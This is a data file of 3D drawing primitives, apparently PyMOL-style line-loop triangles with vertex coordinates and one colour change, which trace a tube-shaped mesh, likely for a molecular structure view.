BEGIN, LINE_LOOP,
VERTEX, 26.689, 36.472, 33.048,
VERTEX, 26.464, 36.761, 33.323,
VERTEX, 26.666, 36.814, 32.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.464, 36.761, 33.323,
VERTEX, 26.666, 36.814, 32.473,
VERTEX, 26.419, 37.096, 32.745,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.666, 36.814, 32.473,
VERTEX, 26.419, 37.096, 32.745,
VERTEX, 26.450, 37.159, 31.650,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.419, 37.096, 32.745,
VERTEX, 26.450, 37.159, 31.650,
VERTEX, 26.194, 37.406, 31.910,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.450, 37.159, 31.650,
VERTEX, 26.194, 37.406, 31.910,
VERTEX, 26.169, 37.304, 31.060,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.194, 37.406, 31.910,
VERTEX, 26.169, 37.304, 31.060,
VERTEX, 25.921, 37.510, 31.308,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.169, 37.304, 31.060,
VERTEX, 25.921, 37.510, 31.308,
VERTEX, 25.986, 37.165, 31.050,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.921, 37.510, 31.308,
VERTEX, 25.986, 37.165, 31.050,
VERTEX, 25.760, 37.347, 31.291,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.986, 37.165, 31.050,
VERTEX, 25.760, 37.347, 31.291,
VERTEX, 26.010, 36.823, 31.625,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.760, 37.347, 31.291,
VERTEX, 26.010, 36.823, 31.625,
VERTEX, 25.805, 37.013, 31.869,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.010, 36.823, 31.625,
VERTEX, 25.805, 37.013, 31.869,
VERTEX, 26.225, 36.479, 32.448,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.805, 37.013, 31.869,
VERTEX, 26.225, 36.479, 32.448,
VERTEX, 26.030, 36.703, 32.704,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.225, 36.479, 32.448,
VERTEX, 26.030, 36.703, 32.704,
VERTEX, 26.507, 36.333, 33.038,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.030, 36.703, 32.704,
VERTEX, 26.507, 36.333, 33.038,
VERTEX, 26.303, 36.599, 33.306,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.507, 36.333, 33.038,
VERTEX, 26.303, 36.599, 33.306,
VERTEX, 26.689, 36.472, 33.048,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.303, 36.599, 33.306,
VERTEX, 26.689, 36.472, 33.048,
VERTEX, 26.464, 36.761, 33.323,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.464, 36.761, 33.323,
VERTEX, 26.195, 37.003, 33.594,
VERTEX, 26.419, 37.096, 32.745,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.195, 37.003, 33.594,
VERTEX, 26.419, 37.096, 32.745,
VERTEX, 26.128, 37.330, 33.014,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.419, 37.096, 32.745,
VERTEX, 26.128, 37.330, 33.014,
VERTEX, 26.194, 37.406, 31.910,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.128, 37.330, 33.014,
VERTEX, 26.194, 37.406, 31.910,
VERTEX, 25.900, 37.608, 32.169,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.194, 37.406, 31.910,
VERTEX, 25.900, 37.608, 32.169,
VERTEX, 25.921, 37.510, 31.308,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.900, 37.608, 32.169,
VERTEX, 25.921, 37.510, 31.308,
VERTEX, 25.644, 37.673, 31.553,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.921, 37.510, 31.308,
VERTEX, 25.644, 37.673, 31.553,
VERTEX, 25.760, 37.347, 31.291,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.644, 37.673, 31.553,
VERTEX, 25.760, 37.347, 31.291,
VERTEX, 25.512, 37.487, 31.528,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.760, 37.347, 31.291,
VERTEX, 25.512, 37.487, 31.528,
VERTEX, 25.805, 37.013, 31.869,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.512, 37.487, 31.528,
VERTEX, 25.805, 37.013, 31.869,
VERTEX, 25.579, 37.160, 32.108,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.805, 37.013, 31.869,
VERTEX, 25.579, 37.160, 32.108,
VERTEX, 26.030, 36.703, 32.704,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.579, 37.160, 32.108,
VERTEX, 26.030, 36.703, 32.704,
VERTEX, 25.807, 36.882, 32.953,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.030, 36.703, 32.704,
VERTEX, 25.807, 36.882, 32.953,
VERTEX, 26.303, 36.599, 33.306,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.807, 36.882, 32.953,
VERTEX, 26.303, 36.599, 33.306,
VERTEX, 26.062, 36.817, 33.568,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.303, 36.599, 33.306,
VERTEX, 26.062, 36.817, 33.568,
VERTEX, 26.464, 36.761, 33.323,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.062, 36.817, 33.568,
VERTEX, 26.464, 36.761, 33.323,
VERTEX, 26.195, 37.003, 33.594,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.195, 37.003, 33.594,
VERTEX, 25.889, 37.174, 33.866,
VERTEX, 26.128, 37.330, 33.014,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.889, 37.174, 33.866,
VERTEX, 26.128, 37.330, 33.014,
VERTEX, 25.797, 37.497, 33.287,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.128, 37.330, 33.014,
VERTEX, 25.797, 37.497, 33.287,
VERTEX, 25.900, 37.608, 32.169,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.797, 37.497, 33.287,
VERTEX, 25.900, 37.608, 32.169,
VERTEX, 25.573, 37.747, 32.432,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.900, 37.608, 32.169,
VERTEX, 25.573, 37.747, 32.432,
VERTEX, 25.644, 37.673, 31.553,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.573, 37.747, 32.432,
VERTEX, 25.644, 37.673, 31.553,
VERTEX, 25.348, 37.778, 31.803,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.644, 37.673, 31.553,
VERTEX, 25.348, 37.778, 31.803,
VERTEX, 25.512, 37.487, 31.528,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.348, 37.778, 31.803,
VERTEX, 25.512, 37.487, 31.528,
VERTEX, 25.254, 37.572, 31.767,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.512, 37.487, 31.528,
VERTEX, 25.254, 37.572, 31.767,
VERTEX, 25.579, 37.160, 32.108,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.254, 37.572, 31.767,
VERTEX, 25.579, 37.160, 32.108,
VERTEX, 25.346, 37.249, 32.346,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.579, 37.160, 32.108,
VERTEX, 25.346, 37.249, 32.346,
VERTEX, 25.807, 36.882, 32.953,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.346, 37.249, 32.346,
VERTEX, 25.807, 36.882, 32.953,
VERTEX, 25.570, 36.999, 33.201,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.807, 36.882, 32.953,
VERTEX, 25.570, 36.999, 33.201,
VERTEX, 26.062, 36.817, 33.568,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.570, 36.999, 33.201,
VERTEX, 26.062, 36.817, 33.568,
VERTEX, 25.795, 36.968, 33.831,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.062, 36.817, 33.568,
VERTEX, 25.795, 36.968, 33.831,
VERTEX, 26.195, 37.003, 33.594,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.795, 36.968, 33.831,
VERTEX, 26.195, 37.003, 33.594,
VERTEX, 25.889, 37.174, 33.866,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.889, 37.174, 33.866,
VERTEX, 25.551, 37.252, 34.147,
VERTEX, 25.797, 37.497, 33.287,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.551, 37.252, 34.147,
VERTEX, 25.797, 37.497, 33.287,
VERTEX, 25.431, 37.571, 33.571,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.797, 37.497, 33.287,
VERTEX, 25.431, 37.571, 33.571,
VERTEX, 25.573, 37.747, 32.432,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.431, 37.571, 33.571,
VERTEX, 25.573, 37.747, 32.432,
VERTEX, 25.220, 37.801, 32.707,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.573, 37.747, 32.432,
VERTEX, 25.220, 37.801, 32.707,
VERTEX, 25.348, 37.778, 31.803,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.220, 37.801, 32.707,
VERTEX, 25.348, 37.778, 31.803,
VERTEX, 25.042, 37.807, 32.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.348, 37.778, 31.803,
VERTEX, 25.042, 37.807, 32.062,
VERTEX, 25.254, 37.572, 31.767,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.042, 37.807, 32.062,
VERTEX, 25.254, 37.572, 31.767,
VERTEX, 25.000, 37.587, 32.013,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.254, 37.572, 31.767,
VERTEX, 25.000, 37.587, 32.013,
VERTEX, 25.346, 37.249, 32.346,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.000, 37.587, 32.013,
VERTEX, 25.346, 37.249, 32.346,
VERTEX, 25.120, 37.268, 32.589,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.346, 37.249, 32.346,
VERTEX, 25.120, 37.268, 32.589,
VERTEX, 25.570, 36.999, 33.201,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.120, 37.268, 32.589,
VERTEX, 25.570, 36.999, 33.201,
VERTEX, 25.331, 37.038, 33.453,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.570, 36.999, 33.201,
VERTEX, 25.331, 37.038, 33.453,
VERTEX, 25.795, 36.968, 33.831,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.331, 37.038, 33.453,
VERTEX, 25.795, 36.968, 33.831,
VERTEX, 25.510, 37.032, 34.098,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.795, 36.968, 33.831,
VERTEX, 25.510, 37.032, 34.098,
VERTEX, 25.889, 37.174, 33.866,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.510, 37.032, 34.098,
VERTEX, 25.889, 37.174, 33.866,
VERTEX, 25.551, 37.252, 34.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.551, 37.252, 34.147,
VERTEX, 25.195, 37.213, 34.439,
VERTEX, 25.431, 37.571, 33.571,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.195, 37.213, 34.439,
VERTEX, 25.431, 37.571, 33.571,
VERTEX, 25.050, 37.524, 33.864,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.431, 37.571, 33.571,
VERTEX, 25.050, 37.524, 33.864,
VERTEX, 25.220, 37.801, 32.707,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.050, 37.524, 33.864,
VERTEX, 25.220, 37.801, 32.707,
VERTEX, 24.861, 37.742, 32.992,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.220, 37.801, 32.707,
VERTEX, 24.861, 37.742, 32.992,
VERTEX, 25.042, 37.807, 32.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.861, 37.742, 32.992,
VERTEX, 25.042, 37.807, 32.062,
VERTEX, 24.740, 37.740, 32.334,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.042, 37.807, 32.062,
VERTEX, 24.740, 37.740, 32.334,
VERTEX, 25.000, 37.587, 32.013,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.740, 37.740, 32.334,
VERTEX, 25.000, 37.587, 32.013,
VERTEX, 24.757, 37.519, 32.275,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.000, 37.587, 32.013,
VERTEX, 24.757, 37.519, 32.275,
VERTEX, 25.120, 37.268, 32.589,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.757, 37.519, 32.275,
VERTEX, 25.120, 37.268, 32.589,
VERTEX, 24.902, 37.208, 32.850,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.120, 37.268, 32.589,
VERTEX, 24.902, 37.208, 32.850,
VERTEX, 25.331, 37.038, 33.453,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.902, 37.208, 32.850,
VERTEX, 25.331, 37.038, 33.453,
VERTEX, 25.091, 36.990, 33.722,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.331, 37.038, 33.453,
VERTEX, 25.091, 36.990, 33.722,
VERTEX, 25.510, 37.032, 34.098,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.091, 36.990, 33.722,
VERTEX, 25.510, 37.032, 34.098,
VERTEX, 25.212, 36.992, 34.380,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.510, 37.032, 34.098,
VERTEX, 25.212, 36.992, 34.380,
VERTEX, 25.551, 37.252, 34.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.212, 36.992, 34.380,
VERTEX, 25.551, 37.252, 34.147,
VERTEX, 25.195, 37.213, 34.439,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.195, 37.213, 34.439,
VERTEX, 24.828, 37.079, 34.696,
VERTEX, 25.050, 37.524, 33.864,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.828, 37.079, 34.696,
VERTEX, 25.050, 37.524, 33.864,
VERTEX, 24.671, 37.379, 34.119,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.050, 37.524, 33.864,
VERTEX, 24.671, 37.379, 34.119,
VERTEX, 24.861, 37.742, 32.992,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.671, 37.379, 34.119,
VERTEX, 24.861, 37.742, 32.992,
VERTEX, 24.514, 37.593, 33.239,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.861, 37.742, 32.992,
VERTEX, 24.514, 37.593, 33.239,
VERTEX, 24.740, 37.740, 32.334,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.514, 37.593, 33.239,
VERTEX, 24.740, 37.740, 32.334,
VERTEX, 24.449, 37.596, 32.573,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.740, 37.740, 32.334,
VERTEX, 24.449, 37.596, 32.573,
VERTEX, 24.757, 37.519, 32.275,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.449, 37.596, 32.573,
VERTEX, 24.757, 37.519, 32.275,
VERTEX, 24.514, 37.384, 32.510,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.757, 37.519, 32.275,
VERTEX, 24.514, 37.384, 32.510,
VERTEX, 24.902, 37.208, 32.850,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.514, 37.384, 32.510,
VERTEX, 24.902, 37.208, 32.850,
VERTEX, 24.671, 37.084, 33.087,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.902, 37.208, 32.850,
VERTEX, 24.671, 37.084, 33.087,
VERTEX, 25.091, 36.990, 33.722,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.671, 37.084, 33.087,
VERTEX, 25.091, 36.990, 33.722,
VERTEX, 24.828, 36.870, 33.967,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.091, 36.990, 33.722,
VERTEX, 24.828, 36.870, 33.967,
VERTEX, 25.212, 36.992, 34.380,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.828, 36.870, 33.967,
VERTEX, 25.212, 36.992, 34.380,
VERTEX, 24.893, 36.868, 34.633,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.212, 36.992, 34.380,
VERTEX, 24.893, 36.868, 34.633,
VERTEX, 25.195, 37.213, 34.439,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.893, 36.868, 34.633,
VERTEX, 25.195, 37.213, 34.439,
VERTEX, 24.828, 37.079, 34.696,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.828, 37.079, 34.696,
VERTEX, 24.454, 36.891, 34.877,
VERTEX, 24.671, 37.379, 34.119,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.454, 36.891, 34.877,
VERTEX, 24.671, 37.379, 34.119,
VERTEX, 24.298, 37.181, 34.294,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.671, 37.379, 34.119,
VERTEX, 24.298, 37.181, 34.294,
VERTEX, 24.514, 37.593, 33.239,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.298, 37.181, 34.294,
VERTEX, 24.514, 37.593, 33.239,
VERTEX, 24.179, 37.394, 33.409,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.514, 37.593, 33.239,
VERTEX, 24.179, 37.394, 33.409,
VERTEX, 24.449, 37.596, 32.573,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.179, 37.394, 33.409,
VERTEX, 24.449, 37.596, 32.573,
VERTEX, 24.166, 37.405, 32.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.449, 37.596, 32.573,
VERTEX, 24.166, 37.405, 32.740,
VERTEX, 24.514, 37.384, 32.510,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.166, 37.405, 32.740,
VERTEX, 24.514, 37.384, 32.510,
VERTEX, 24.267, 37.208, 32.679,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.514, 37.384, 32.510,
VERTEX, 24.267, 37.208, 32.679,
VERTEX, 24.671, 37.084, 33.087,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.267, 37.208, 32.679,
VERTEX, 24.671, 37.084, 33.087,
VERTEX, 24.423, 36.918, 33.262,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.671, 37.084, 33.087,
VERTEX, 24.423, 36.918, 33.262,
VERTEX, 24.828, 36.870, 33.967,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.423, 36.918, 33.262,
VERTEX, 24.828, 36.870, 33.967,
VERTEX, 24.543, 36.706, 34.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.828, 36.870, 33.967,
VERTEX, 24.543, 36.706, 34.147,
VERTEX, 24.893, 36.868, 34.633,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.543, 36.706, 34.147,
VERTEX, 24.893, 36.868, 34.633,
VERTEX, 24.555, 36.694, 34.817,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.893, 36.868, 34.633,
VERTEX, 24.555, 36.694, 34.817,
VERTEX, 24.828, 37.079, 34.696,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.555, 36.694, 34.817,
VERTEX, 24.828, 37.079, 34.696,
VERTEX, 24.454, 36.891, 34.877,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.454, 36.891, 34.877,
VERTEX, 24.082, 36.653, 34.996,
VERTEX, 24.298, 37.181, 34.294,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.082, 36.653, 34.996,
VERTEX, 24.298, 37.181, 34.294,
VERTEX, 23.934, 36.933, 34.405,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.298, 37.181, 34.294,
VERTEX, 23.934, 36.933, 34.405,
VERTEX, 24.179, 37.394, 33.409,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.934, 36.933, 34.405,
VERTEX, 24.179, 37.394, 33.409,
VERTEX, 23.857, 37.148, 33.516,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.179, 37.394, 33.409,
VERTEX, 23.857, 37.148, 33.516,
VERTEX, 24.166, 37.405, 32.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.857, 37.148, 33.516,
VERTEX, 24.166, 37.405, 32.740,
VERTEX, 23.896, 37.173, 32.848,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.166, 37.405, 32.740,
VERTEX, 23.896, 37.173, 32.848,
VERTEX, 24.267, 37.208, 32.679,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.896, 37.173, 32.848,
VERTEX, 24.267, 37.208, 32.679,
VERTEX, 24.027, 36.993, 32.793,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.267, 37.208, 32.679,
VERTEX, 24.027, 36.993, 32.793,
VERTEX, 24.423, 36.918, 33.262,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.027, 36.993, 32.793,
VERTEX, 24.423, 36.918, 33.262,
VERTEX, 24.175, 36.713, 33.383,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.423, 36.918, 33.262,
VERTEX, 24.175, 36.713, 33.383,
VERTEX, 24.543, 36.706, 34.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.175, 36.713, 33.383,
VERTEX, 24.543, 36.706, 34.147,
VERTEX, 24.252, 36.498, 34.273,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.543, 36.706, 34.147,
VERTEX, 24.252, 36.498, 34.273,
VERTEX, 24.555, 36.694, 34.817,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.252, 36.498, 34.273,
VERTEX, 24.555, 36.694, 34.817,
VERTEX, 24.213, 36.473, 34.941,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.555, 36.694, 34.817,
VERTEX, 24.213, 36.473, 34.941,
VERTEX, 24.454, 36.891, 34.877,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.213, 36.473, 34.941,
VERTEX, 24.454, 36.891, 34.877,
VERTEX, 24.082, 36.653, 34.996,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.082, 36.653, 34.996,
VERTEX, 23.722, 36.368, 35.062,
VERTEX, 23.934, 36.933, 34.405,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.722, 36.368, 35.062,
VERTEX, 23.934, 36.933, 34.405,
VERTEX, 23.589, 36.638, 34.464,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.934, 36.933, 34.405,
VERTEX, 23.589, 36.638, 34.464,
VERTEX, 23.857, 37.148, 33.516,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.589, 36.638, 34.464,
VERTEX, 23.857, 37.148, 33.516,
VERTEX, 23.558, 36.860, 33.573,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.857, 37.148, 33.516,
VERTEX, 23.558, 36.860, 33.573,
VERTEX, 23.896, 37.173, 32.848,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.558, 36.860, 33.573,
VERTEX, 23.896, 37.173, 32.848,
VERTEX, 23.647, 36.903, 32.911,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.896, 37.173, 32.848,
VERTEX, 23.647, 36.903, 32.911,
VERTEX, 24.027, 36.993, 32.793,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.647, 36.903, 32.911,
VERTEX, 24.027, 36.993, 32.793,
VERTEX, 23.804, 36.742, 32.866,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.027, 36.993, 32.793,
VERTEX, 23.804, 36.742, 32.866,
VERTEX, 24.175, 36.713, 33.383,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.804, 36.742, 32.866,
VERTEX, 24.175, 36.713, 33.383,
VERTEX, 23.937, 36.471, 33.463,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.175, 36.713, 33.383,
VERTEX, 23.937, 36.471, 33.463,
VERTEX, 24.252, 36.498, 34.273,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.937, 36.471, 33.463,
VERTEX, 24.252, 36.498, 34.273,
VERTEX, 23.968, 36.249, 34.354,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.252, 36.498, 34.273,
VERTEX, 23.968, 36.249, 34.354,
VERTEX, 24.213, 36.473, 34.941,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.968, 36.249, 34.354,
VERTEX, 24.213, 36.473, 34.941,
VERTEX, 23.879, 36.206, 35.016,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.213, 36.473, 34.941,
VERTEX, 23.879, 36.206, 35.016,
VERTEX, 24.082, 36.653, 34.996,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.879, 36.206, 35.016,
VERTEX, 24.082, 36.653, 34.996,
VERTEX, 23.722, 36.368, 35.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.722, 36.368, 35.062,
VERTEX, 23.387, 36.037, 35.087,
VERTEX, 23.589, 36.638, 34.464,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.387, 36.037, 35.087,
VERTEX, 23.589, 36.638, 34.464,
VERTEX, 23.272, 36.300, 34.483,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.589, 36.638, 34.464,
VERTEX, 23.272, 36.300, 34.483,
VERTEX, 23.558, 36.860, 33.573,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.272, 36.300, 34.483,
VERTEX, 23.558, 36.860, 33.573,
VERTEX, 23.289, 36.534, 33.595,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.558, 36.860, 33.573,
VERTEX, 23.289, 36.534, 33.595,
VERTEX, 23.647, 36.903, 32.911,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.289, 36.534, 33.595,
VERTEX, 23.647, 36.903, 32.911,
VERTEX, 23.427, 36.599, 32.943,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.647, 36.903, 32.911,
VERTEX, 23.427, 36.599, 32.943,
VERTEX, 23.804, 36.742, 32.866,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.427, 36.599, 32.943,
VERTEX, 23.804, 36.742, 32.866,
VERTEX, 23.606, 36.460, 32.909,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.804, 36.742, 32.866,
VERTEX, 23.606, 36.460, 32.909,
VERTEX, 23.937, 36.471, 33.463,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.606, 36.460, 32.909,
VERTEX, 23.937, 36.471, 33.463,
VERTEX, 23.721, 36.196, 33.514,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.937, 36.471, 33.463,
VERTEX, 23.721, 36.196, 33.514,
VERTEX, 23.968, 36.249, 34.354,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.721, 36.196, 33.514,
VERTEX, 23.968, 36.249, 34.354,
VERTEX, 23.704, 35.963, 34.402,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.968, 36.249, 34.354,
VERTEX, 23.704, 35.963, 34.402,
VERTEX, 23.879, 36.206, 35.016,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.704, 35.963, 34.402,
VERTEX, 23.879, 36.206, 35.016,
VERTEX, 23.566, 35.897, 35.054,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.879, 36.206, 35.016,
VERTEX, 23.566, 35.897, 35.054,
VERTEX, 23.722, 36.368, 35.062,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.566, 35.897, 35.054,
VERTEX, 23.722, 36.368, 35.062,
VERTEX, 23.387, 36.037, 35.087,
END,
COLOR, 0.000, 1.000, 0.976,
BEGIN, LINE_LOOP,
VERTEX, 23.387, 36.037, 35.087,
VERTEX, 23.089, 35.662, 35.083,
VERTEX, 23.272, 36.300, 34.483,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.089, 35.662, 35.083,
VERTEX, 23.272, 36.300, 34.483,
VERTEX, 22.995, 35.921, 34.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.272, 36.300, 34.483,
VERTEX, 22.995, 35.921, 34.473,
VERTEX, 23.289, 36.534, 33.595,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.995, 35.921, 34.473,
VERTEX, 23.289, 36.534, 33.595,
VERTEX, 23.059, 36.171, 33.592,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.289, 36.534, 33.595,
VERTEX, 23.059, 36.171, 33.592,
VERTEX, 23.427, 36.599, 32.943,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.059, 36.171, 33.592,
VERTEX, 23.427, 36.599, 32.943,
VERTEX, 23.244, 36.265, 32.955,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.427, 36.599, 32.943,
VERTEX, 23.244, 36.265, 32.955,
VERTEX, 23.606, 36.460, 32.909,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.244, 36.265, 32.955,
VERTEX, 23.606, 36.460, 32.909,
VERTEX, 23.442, 36.150, 32.937,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.606, 36.460, 32.909,
VERTEX, 23.442, 36.150, 32.937,
VERTEX, 23.721, 36.196, 33.514,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.442, 36.150, 32.937,
VERTEX, 23.721, 36.196, 33.514,
VERTEX, 23.536, 35.892, 33.547,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.721, 36.196, 33.514,
VERTEX, 23.536, 35.892, 33.547,
VERTEX, 23.704, 35.963, 34.402,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.536, 35.892, 33.547,
VERTEX, 23.704, 35.963, 34.402,
VERTEX, 23.472, 35.642, 34.429,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.704, 35.963, 34.402,
VERTEX, 23.472, 35.642, 34.429,
VERTEX, 23.566, 35.897, 35.054,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.472, 35.642, 34.429,
VERTEX, 23.566, 35.897, 35.054,
VERTEX, 23.286, 35.547, 35.065,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.566, 35.897, 35.054,
VERTEX, 23.286, 35.547, 35.065,
VERTEX, 23.387, 36.037, 35.087,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.286, 35.547, 35.065,
VERTEX, 23.387, 36.037, 35.087,
VERTEX, 23.089, 35.662, 35.083,
END,
BEGIN, LINE_LOOP,
